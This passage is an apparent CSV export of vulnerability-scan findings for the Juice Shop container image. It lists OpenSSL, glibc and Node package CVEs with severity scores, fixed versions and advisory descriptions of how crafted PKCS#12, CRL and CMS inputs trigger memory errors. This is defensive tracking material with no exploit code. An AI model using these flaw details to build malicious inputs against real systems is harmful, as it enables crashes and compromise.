NEWLINE ",False,,,False,,,,False,bkimminich/juice-shop:v19.0.0 (debian 12.11),,False,,False,False,,False,,020cb0ec26772da3ef6d80082585eb62a85f5e296811e690c47540bdce0ff70f,29,affected,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:04.792464+00:00,,,,,0,[],,,S1,False,,,,,,,,False,http://www.openwall.com/lists/oss-security/2026/01/16/5 NEWLINE https://access.redhat.com/errata/RHSA-2026:2786 NEWLINE https://access.redhat.com/security/cve/CVE-2026-0861 NEWLINE https://bugzilla.redhat.com/2429771 NEWLINE https://bugzilla.redhat.com/2430201 NEWLINE https://bugzilla.redhat.com/2431196 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2429771 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2430201 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2431196 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15281 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0861 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0915 NEWLINE https://errata.almalinux.org/9/ALSA-2026-2786.html NEWLINE https://errata.rockylinux.org/RLSA-2026:2786 NEWLINE https://linux.oracle.com/cve/CVE-2026-0861.html NEWLINE https://linux.oracle.com/errata/ELSA-2026-50120.html NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-0861 NEWLINE https://sourceware.org/bugzilla/show_bug.cgi?id=33796 NEWLINE https://sourceware.org/git/?p=glibc.git;a=blob_plain;f=advisories/GLIBC-SA-2026-0001 NEWLINE https://ubuntu.com/security/notices/USN-8005-1 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-0861,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-0861 Libc6 2.36-9+deb12u10,False,False,,2026-05-12 17:37:04.792379+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-0861,debian; os-pkgs,"Active, Verified", +,,True,0,[],libssl3,3.0.17-1~deb12u2,2026-05-12 17:37:04.887081+00:00,CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N,7.4,,,787,2026-05-12,,,"openssl: OpenSSL: 
Arbitrary code execution due to out-of-bounds write in PKCS#12 processing NEWLINE **Target:** bkimminich/juice-shop:v19.0.0 (debian 12.11) NEWLINE **Type:** debian NEWLINE **Fixed version:** 3.0.18-1~deb12u2 NEWLINE NEWLINE Issue summary: Calling PKCS12_get_friendlyname() function on a maliciously NEWLINE crafted PKCS#12 file with a BMPString (UTF-16BE) friendly name containing NEWLINE non-ASCII BMP code point can trigger a one byte write before the allocated NEWLINE buffer. NEWLINE NEWLINE Impact summary: The out-of-bounds write can cause a memory corruption NEWLINE which can have various consequences including a Denial of Service. NEWLINE NEWLINE The OPENSSL_uni2utf8() function performs a two-pass conversion of a PKCS#12 NEWLINE BMPString (UTF-16BE) to UTF-8. In the second pass, when emitting UTF-8 bytes, NEWLINE the helper function bmp_to_utf8() incorrectly forwards the remaining UTF-16 NEWLINE source byte count as the destination buffer capacity to UTF8_putc(). For BMP NEWLINE code points above U+07FF, UTF-8 requires three bytes, but the forwarded NEWLINE capacity can be just two bytes. UTF8_putc() then returns -1, and this negative NEWLINE value is added to the output length without validation, causing the NEWLINE length to become negative. The subsequent trailing NUL byte is then written NEWLINE at a negative offset, causing write outside of heap allocated buffer. NEWLINE NEWLINE The vulnerability is reachable via the public PKCS12_get_friendlyname() API NEWLINE when parsing attacker-controlled PKCS#12 files. While PKCS12_parse() uses a NEWLINE different code path that avoids this issue, PKCS12_get_friendlyname() directly NEWLINE invokes the vulnerable function. Exploitation requires an attacker to provide NEWLINE a malicious PKCS#12 file to be parsed by the application and the attacker NEWLINE can just trigger a one zero byte write before the allocated buffer. 
NEWLINE For that reason the issue was assessed as Low severity according to our NEWLINE Security Policy. NEWLINE NEWLINE The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this issue, NEWLINE as the PKCS#12 implementation is outside the OpenSSL FIPS module boundary. NEWLINE NEWLINE OpenSSL 3.6, 3.5, 3.4, 3.3, 3.0 and 1.1.1 are vulnerable to this issue. NEWLINE NEWLINE OpenSSL 1.0.2 is not affected by this issue. NEWLINE ",False,,,False,,,,False,bkimminich/juice-shop:v19.0.0 (debian 12.11),,True,,False,False,,False,,661527917bdf4cb885d4c2581cd30e6b1ac301b05d02d5d7c927e6c7e4133f10,51,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:04.887141+00:00,,,,,0,[],3.0.18-1~deb12u2,,S1,False,,,,,,,,False,https://access.redhat.com/errata/RHSA-2026:4472 NEWLINE https://access.redhat.com/security/cve/CVE-2025-69419 NEWLINE https://bugzilla.redhat.com/2430386 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2430375 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2430376 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2430377 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2430378 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2430379 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2430380 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2430381 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2430386 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2430387 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2430388 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2430389 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2430390 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-11187 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15467 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15468 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15469 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-66199 NEWLINE 
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-68160 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69418 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69419 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69420 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69421 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22795 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22796 NEWLINE https://errata.almalinux.org/9/ALSA-2026-4472.html NEWLINE https://errata.rockylinux.org/RLSA-2026:1473 NEWLINE https://github.com/advisories/GHSA-x77r-97gw-wh89 NEWLINE https://github.com/openssl/openssl/commit/41be0f216404f14457bbf3b9cc488dba60b49296 NEWLINE https://github.com/openssl/openssl/commit/7e9cac9832e4705b91987c2474ed06a37a93cecb NEWLINE https://github.com/openssl/openssl/commit/a26a90d38edec3748566129d824e664b54bee2e2 NEWLINE https://github.com/openssl/openssl/commit/cda12de3bc0e333ea8d2c6fd15001dbdaf280015 NEWLINE https://github.com/openssl/openssl/commit/ff628933755075446bca8307e8417c14d164b535 NEWLINE https://linux.oracle.com/cve/CVE-2025-69419.html NEWLINE https://linux.oracle.com/errata/ELSA-2026-50131.html NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2025-69419 NEWLINE https://openssl-library.org/news/secadv/20260127.txt NEWLINE https://ubuntu.com/security/notices/USN-7980-1 NEWLINE https://ubuntu.com/security/notices/USN-7980-2 NEWLINE https://www.cve.org/CVERecord?id=CVE-2025-69419,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2025-69419 Libssl3 3.0.17-1~deb12u2,False,False,,2026-05-12 17:37:04.887090+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2025-69419,debian; os-pkgs,"Active, Verified", +,,True,0,[],libssl3,3.0.17-1~deb12u2,2026-05-12 17:37:04.891364+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,476,2026-05-12,,,"openssl: OpenSSL: Denial of Service via malformed PKCS#12 file 
processing NEWLINE **Target:** bkimminich/juice-shop:v19.0.0 (debian 12.11) NEWLINE **Type:** debian NEWLINE **Fixed version:** 3.0.18-1~deb12u2 NEWLINE NEWLINE Issue summary: Processing a malformed PKCS#12 file can trigger a NULL pointer NEWLINE dereference in the PKCS12_item_decrypt_d2i_ex() function. NEWLINE NEWLINE Impact summary: A NULL pointer dereference can trigger a crash which leads to NEWLINE Denial of Service for an application processing PKCS#12 files. NEWLINE NEWLINE The PKCS12_item_decrypt_d2i_ex() function does not check whether the oct NEWLINE parameter is NULL before dereferencing it. When called from NEWLINE PKCS12_unpack_p7encdata() with a malformed PKCS#12 file, this parameter can NEWLINE be NULL, causing a crash. The vulnerability is limited to Denial of Service NEWLINE and cannot be escalated to achieve code execution or memory disclosure. NEWLINE NEWLINE Exploiting this issue requires an attacker to provide a malformed PKCS#12 file NEWLINE to an application that processes it. For that reason the issue was assessed as NEWLINE Low severity according to our Security Policy. NEWLINE NEWLINE The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this issue, NEWLINE as the PKCS#12 implementation is outside the OpenSSL FIPS module boundary. NEWLINE NEWLINE OpenSSL 3.6, 3.5, 3.4, 3.3, 3.0, 1.1.1 and 1.0.2 are vulnerable to this issue. 
NEWLINE ",False,,,False,,,,False,bkimminich/juice-shop:v19.0.0 (debian 12.11),,True,,False,False,,False,,1fe4b7708e906afecfba5150b323f06ded2fa21e8f6847518f3045ecb05d35ea,52,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:04.891419+00:00,,,,,0,[],3.0.18-1~deb12u2,,S1,False,,,,,,,,False,https://access.redhat.com/errata/RHSA-2026:1473 NEWLINE https://access.redhat.com/security/cve/CVE-2025-69421 NEWLINE https://bugzilla.redhat.com/2430375 NEWLINE https://bugzilla.redhat.com/2430376 NEWLINE https://bugzilla.redhat.com/2430377 NEWLINE https://bugzilla.redhat.com/2430378 NEWLINE https://bugzilla.redhat.com/2430379 NEWLINE https://bugzilla.redhat.com/2430380 NEWLINE https://bugzilla.redhat.com/2430381 NEWLINE https://bugzilla.redhat.com/2430386 NEWLINE https://bugzilla.redhat.com/2430387 NEWLINE https://bugzilla.redhat.com/2430388 NEWLINE https://bugzilla.redhat.com/2430389 NEWLINE https://bugzilla.redhat.com/2430390 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2430375 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2430376 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2430377 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2430378 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2430379 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2430380 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2430381 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2430386 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2430387 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2430388 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2430389 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2430390 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-11187 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15467 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15468 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15469 NEWLINE 
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-66199 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-68160 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69418 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69419 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69420 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69421 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22795 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22796 NEWLINE https://errata.almalinux.org/9/ALSA-2026-1473.html NEWLINE https://errata.rockylinux.org/RLSA-2026:1473 NEWLINE https://github.com/advisories/GHSA-w9rv-xc8m-cmqp NEWLINE https://github.com/openssl/openssl/commit/3524a29271f8191b8fd8a5257eb05173982a097b NEWLINE https://github.com/openssl/openssl/commit/36ecb4960872a4ce04bf6f1e1f4e78d75ec0c0c7 NEWLINE https://github.com/openssl/openssl/commit/4bbc8d41a72c842ce4077a8a3eccd1109aaf74bd NEWLINE https://github.com/openssl/openssl/commit/643986985cd1c21221f941129d76fe0c2785aeb3 NEWLINE https://github.com/openssl/openssl/commit/a2dbc539f0f9cc63832709fa5aa33ad9495eb19c NEWLINE https://linux.oracle.com/cve/CVE-2025-69421.html NEWLINE https://linux.oracle.com/errata/ELSA-2026-50081.html NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2025-69421 NEWLINE https://openssl-library.org/news/secadv/20260127.txt NEWLINE https://ubuntu.com/security/notices/USN-7980-1 NEWLINE https://ubuntu.com/security/notices/USN-7980-2 NEWLINE https://www.cve.org/CVERecord?id=CVE-2025-69421,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2025-69421 Libssl3 3.0.17-1~deb12u2,False,False,,2026-05-12 17:37:04.891372+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2025-69421,debian; os-pkgs,"Active, Verified", +,,True,0,[],libssl3,3.0.17-1~deb12u2,2026-05-12 
17:37:04.895080+00:00,CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H,8.1,,,416,2026-05-12,,,"openssl: OpenSSL: Arbitrary code execution due to use-after-free in DANE TLSA authentication NEWLINE **Target:** bkimminich/juice-shop:v19.0.0 (debian 12.11) NEWLINE **Type:** debian NEWLINE **Fixed version:** 3.0.19-1~deb12u2 NEWLINE NEWLINE Issue summary: An uncommon configuration of clients performing DANE TLSA-based NEWLINE server authentication, when paired with uncommon server DANE TLSA records, may NEWLINE result in a use-after-free and/or double-free on the client side. NEWLINE NEWLINE Impact summary: A use after free can have a range of potential consequences NEWLINE such as the corruption of valid data, crashes or execution of arbitrary code. NEWLINE NEWLINE However, the issue only affects clients that make use of TLSA records with both NEWLINE the PKIX-TA(0/PKIX-EE(1) certificate usages and the DANE-TA(2) certificate NEWLINE usage. NEWLINE NEWLINE By far the most common deployment of DANE is in SMTP MTAs for which RFC7672 NEWLINE recommends that clients treat as 'unusable' any TLSA records that have the PKIX NEWLINE certificate usages. These SMTP (or other similar) clients are not vulnerable NEWLINE to this issue. Conversely, any clients that support only the PKIX usages, and NEWLINE ignore the DANE-TA(2) usage are also not vulnerable. NEWLINE NEWLINE The client would also need to be communicating with a server that publishes a NEWLINE TLSA RRset with both types of TLSA records. NEWLINE NEWLINE No FIPS modules are affected by this issue, the problem code is outside the NEWLINE FIPS module boundary. 
NEWLINE ",False,,,False,,,,False,bkimminich/juice-shop:v19.0.0 (debian 12.11),,True,,False,False,,False,,94a9556a163cfe49793dd68a6e3901e59f6247a5f9a1259a5db736b53d98d81c,53,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:04.895142+00:00,,,,,0,[],3.0.19-1~deb12u2,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-28387 NEWLINE https://github.com/openssl/openssl/commit/07e727d304746edb49a98ee8f6ab00256e1f012b NEWLINE https://github.com/openssl/openssl/commit/258a8f63b26995ba357f4326da00e19e29c6acbe NEWLINE https://github.com/openssl/openssl/commit/444958deaf450aea819171f97ae69eaedede42c3 NEWLINE https://github.com/openssl/openssl/commit/7a4e08cee62a728d32e60b0de89e6764339df0a7 NEWLINE https://github.com/openssl/openssl/commit/ec03fa050b3346997ed9c5fef3d0e16ad7db8177 NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-28387 NEWLINE https://openssl-library.org/news/secadv/20260407.txt NEWLINE https://ubuntu.com/security/notices/USN-8155-1 NEWLINE https://ubuntu.com/security/notices/USN-8155-2 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-28387 NEWLINE https://www.openwall.com/lists/oss-security/2026/04/07/11,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-28387 Libssl3 3.0.17-1~deb12u2,False,False,,2026-05-12 17:37:04.895093+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-28387,debian; os-pkgs,"Active, Verified", +,,True,0,[],libssl3,3.0.17-1~deb12u2,2026-05-12 17:37:04.899365+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,476,2026-05-12,,,"openssl: OpenSSL: Denial of Service due to NULL pointer dereference in delta CRL processing NEWLINE **Target:** bkimminich/juice-shop:v19.0.0 (debian 12.11) NEWLINE **Type:** debian NEWLINE **Fixed version:** 3.0.19-1~deb12u2 NEWLINE NEWLINE Issue summary: When a delta CRL that contains a Delta CRL Indicator extension NEWLINE is processed a NULL pointer dereference might happen if 
the required CRL NEWLINE Number extension is missing. NEWLINE NEWLINE Impact summary: A NULL pointer dereference can trigger a crash which NEWLINE leads to a Denial of Service for an application. NEWLINE NEWLINE When CRL processing and delta CRL processing is enabled during X.509 NEWLINE certificate verification, the delta CRL processing does not check NEWLINE whether the CRL Number extension is NULL before dereferencing it. NEWLINE When a malformed delta CRL file is being processed, this parameter NEWLINE can be NULL, causing a NULL pointer dereference. NEWLINE NEWLINE Exploiting this issue requires the X509_V_FLAG_USE_DELTAS flag to be enabled in NEWLINE the verification context, the certificate being verified to contain a NEWLINE freshestCRL extension or the base CRL to have the EXFLAG_FRESHEST flag set, and NEWLINE an attacker to provide a malformed CRL to an application that processes it. NEWLINE NEWLINE The vulnerability is limited to Denial of Service and cannot be escalated to NEWLINE achieve code execution or memory disclosure. For that reason the issue was NEWLINE assessed as Low severity according to our Security Policy. NEWLINE NEWLINE The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this issue, NEWLINE as the affected code is outside the OpenSSL FIPS module boundary. 
NEWLINE ",False,,,False,,,,False,bkimminich/juice-shop:v19.0.0 (debian 12.11),,True,,False,False,,False,,09ad92fad52011d71a7d61e39e5ae440d190fa5cb7c22a24a5a2306f9a0428bd,54,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:04.899426+00:00,,,,,0,[],3.0.19-1~deb12u2,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-28388 NEWLINE https://github.com/openssl/openssl/commit/59c3b3158553ab53275bbbccca5cb305d591cf2e NEWLINE https://github.com/openssl/openssl/commit/5a0b4930779cd2408880979db765db919da55139 NEWLINE https://github.com/openssl/openssl/commit/602542f2c0c2d5edb47128f93eac10b62aeeefb3 NEWLINE https://github.com/openssl/openssl/commit/a9d187dd1000130100fa7ab915f8513532cb3bb8 NEWLINE https://github.com/openssl/openssl/commit/d3a901e8d9f021f3e67d6cfbc12e768129862726 NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-28388 NEWLINE https://openssl-library.org/news/secadv/20260407.txt NEWLINE https://ubuntu.com/security/notices/USN-8155-1 NEWLINE https://ubuntu.com/security/notices/USN-8155-2 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-28388 NEWLINE https://www.openwall.com/lists/oss-security/2026/04/07/11,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-28388 Libssl3 3.0.17-1~deb12u2,False,False,,2026-05-12 17:37:04.899374+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-28388,debian; os-pkgs,"Active, Verified", +,,True,0,[],libssl3,3.0.17-1~deb12u2,2026-05-12 17:37:04.903319+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,476,2026-05-12,,,"openssl: OpenSSL: Denial of Service vulnerability in CMS processing NEWLINE **Target:** bkimminich/juice-shop:v19.0.0 (debian 12.11) NEWLINE **Type:** debian NEWLINE **Fixed version:** 3.0.19-1~deb12u2 NEWLINE NEWLINE Issue summary: During processing of a crafted CMS EnvelopedData message NEWLINE with KeyAgreeRecipientInfo a NULL pointer dereference can happen. 
NEWLINE NEWLINE Impact summary: Applications that process attacker-controlled CMS data may NEWLINE crash before authentication or cryptographic operations occur resulting in NEWLINE Denial of Service. NEWLINE NEWLINE When a CMS EnvelopedData message that uses KeyAgreeRecipientInfo is NEWLINE processed, the optional parameters field of KeyEncryptionAlgorithmIdentifier NEWLINE is examined without checking for its presence. This results in a NULL NEWLINE pointer dereference if the field is missing. NEWLINE NEWLINE Applications and services that call CMS_decrypt() on untrusted input NEWLINE (e.g., S/MIME processing or CMS-based protocols) are vulnerable. NEWLINE NEWLINE The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this NEWLINE issue, as the affected code is outside the OpenSSL FIPS module boundary. NEWLINE ",False,,,False,,,,False,bkimminich/juice-shop:v19.0.0 (debian 12.11),,True,,False,False,,False,,a586469a8745f31bc1a7b97867d18b24a4857360173dd1f9deb328adfa579a37,55,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:04.903376+00:00,,,,,0,[],3.0.19-1~deb12u2,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-28389 NEWLINE https://github.com/advisories/GHSA-7x88-9hgc-69gf NEWLINE https://github.com/openssl/openssl/commit/16cea4188e0ea567deb4f93f85902247e67384f5 NEWLINE https://github.com/openssl/openssl/commit/785cbf7ea3b5a6f5adf0c1ccb92b79d89c35c616 NEWLINE https://github.com/openssl/openssl/commit/7b5274e812400cacb6f3be4c2df5340923fa807f NEWLINE https://github.com/openssl/openssl/commit/c6725634e089eb2b634b10ede33944be7248172a NEWLINE https://github.com/openssl/openssl/commit/f80f83bc5fd036bc47d773e8b15a001e2b4ce686 NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-28389 NEWLINE https://openssl-library.org/news/secadv/20260407.txt NEWLINE https://ubuntu.com/security/notices/USN-8155-1 NEWLINE https://ubuntu.com/security/notices/USN-8155-2 NEWLINE 
https://www.cve.org/CVERecord?id=CVE-2026-28389 NEWLINE https://www.openwall.com/lists/oss-security/2026/04/07/11,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-28389 Libssl3 3.0.17-1~deb12u2,False,False,,2026-05-12 17:37:04.903328+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-28389,debian; os-pkgs,"Active, Verified", +,,True,0,[],libssl3,3.0.17-1~deb12u2,2026-05-12 17:37:04.907012+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,476,2026-05-12,,,"openssl: OpenSSL: Denial of Service due to NULL pointer dereference in CMS EnvelopedData processing NEWLINE **Target:** bkimminich/juice-shop:v19.0.0 (debian 12.11) NEWLINE **Type:** debian NEWLINE **Fixed version:** 3.0.19-1~deb12u2 NEWLINE NEWLINE Issue summary: During processing of a crafted CMS EnvelopedData message NEWLINE with KeyTransportRecipientInfo a NULL pointer dereference can happen. NEWLINE NEWLINE Impact summary: Applications that process attacker-controlled CMS data may NEWLINE crash before authentication or cryptographic operations occur resulting in NEWLINE Denial of Service. NEWLINE NEWLINE When a CMS EnvelopedData message that uses KeyTransportRecipientInfo with NEWLINE RSA-OAEP encryption is processed, the optional parameters field of NEWLINE RSA-OAEP SourceFunc algorithm identifier is examined without checking NEWLINE for its presence. This results in a NULL pointer dereference if the field NEWLINE is missing. NEWLINE NEWLINE Applications and services that call CMS_decrypt() on untrusted input NEWLINE (e.g., S/MIME processing or CMS-based protocols) are vulnerable. NEWLINE NEWLINE The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this NEWLINE issue, as the affected code is outside the OpenSSL FIPS module boundary. 
NEWLINE ",False,,,False,,,,False,bkimminich/juice-shop:v19.0.0 (debian 12.11),,True,,False,False,,False,,94d7dcf984f5babda61d73e7274780d57b0f82a560528099a162a467e6d92c40,56,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:04.907093+00:00,,,,,0,[],3.0.19-1~deb12u2,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-28390 NEWLINE https://github.com/openssl/openssl/commit/01194a8f1941115cd0383bfa91c736dd3993c8bc NEWLINE https://github.com/openssl/openssl/commit/2e39b7a6993be445fddb9fbce316fa756e0397b6 NEWLINE https://github.com/openssl/openssl/commit/af2a5fecd3e71a29e7568f9c1453dec5cebbaff4 NEWLINE https://github.com/openssl/openssl/commit/ea7b4ea4f9f853521ba34830cbcadc970d2e0788 NEWLINE https://github.com/openssl/openssl/commit/fd2f1a6cf53b9ceeca723a001aa4b825d7c7ee75 NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-28390 NEWLINE https://openssl-library.org/news/secadv/20260407.txt NEWLINE https://ubuntu.com/security/notices/USN-8155-1 NEWLINE https://ubuntu.com/security/notices/USN-8155-2 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-28390 NEWLINE https://www.openwall.com/lists/oss-security/2026/04/07/11,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-28390 Libssl3 3.0.17-1~deb12u2,False,False,,2026-05-12 17:37:04.907022+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-28390,debian; os-pkgs,"Active, Verified", +,,True,0,[],base64url,0.0.6,2026-05-12 17:37:04.963142+00:00,,,,,0,2026-05-12,,,Out-of-bounds Read NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** >=3.0.0 NEWLINE NEWLINE `base64url` allocates uninitialized Buffers when number is passed in input on Node.js 4.x and below NEWLINE ,False,,,False,,,,False,juice-shop/node_modules/base64url/package.json,,True,,False,False,,False,,be151895c91d23d77b7d6356209b590633dac21e5af1e47b9758081ce5118e47,69,fixed,False,,False,2026-05-12 
17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:04.963200+00:00,,,,,0,[],>=3.0.0,,S1,False,,,,,,,,False,https://github.com/brianloveswords/base64url/pull/25 NEWLINE https://hackerone.com/reports/321687,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,NSWG-ECO-428 Base64url 0.0.6,False,False,,2026-05-12 17:37:04.963150+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,NSWG-ECO-428,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],braces,2.3.2,2026-05-12 17:37:05.018151+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,1050,2026-05-12,,,"braces: fails to limit the number of characters it can handle NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 3.0.3 NEWLINE NEWLINE The NPM package `braces`, versions prior to 3.0.3, fails to limit the number of characters it can handle, which could lead to Memory Exhaustion. In `lib/parse.js,` if a malicious user sends ""imbalanced braces"" as input, the parsing will enter a loop, which will cause the program to start allocating heap memory without freeing it at any moment of the loop. Eventually, the JavaScript heap limit is reached, and the program will crash. 
NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/braces/package.json,,True,,False,False,,False,,568df38b03dd302ca712ae63e22d3ae68d4f6547f7304d6347552b380e39ec58,83,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.018203+00:00,,,,,0,[],3.0.3,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2024-4068 NEWLINE https://devhub.checkmarx.com/cve-details/CVE-2024-4068 NEWLINE https://devhub.checkmarx.com/cve-details/CVE-2024-4068/ NEWLINE https://github.com/micromatch/braces NEWLINE https://github.com/micromatch/braces/blob/98414f9f1fabe021736e26836d8306d5de747e0d/lib/parse.js#L308 NEWLINE https://github.com/micromatch/braces/commit/415d660c3002d1ab7e63dbf490c9851da80596ff NEWLINE https://github.com/micromatch/braces/issues/35 NEWLINE https://github.com/micromatch/braces/pull/37 NEWLINE https://github.com/micromatch/braces/pull/40 NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2024-4068 NEWLINE https://www.cve.org/CVERecord?id=CVE-2024-4068,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2024-4068 Braces 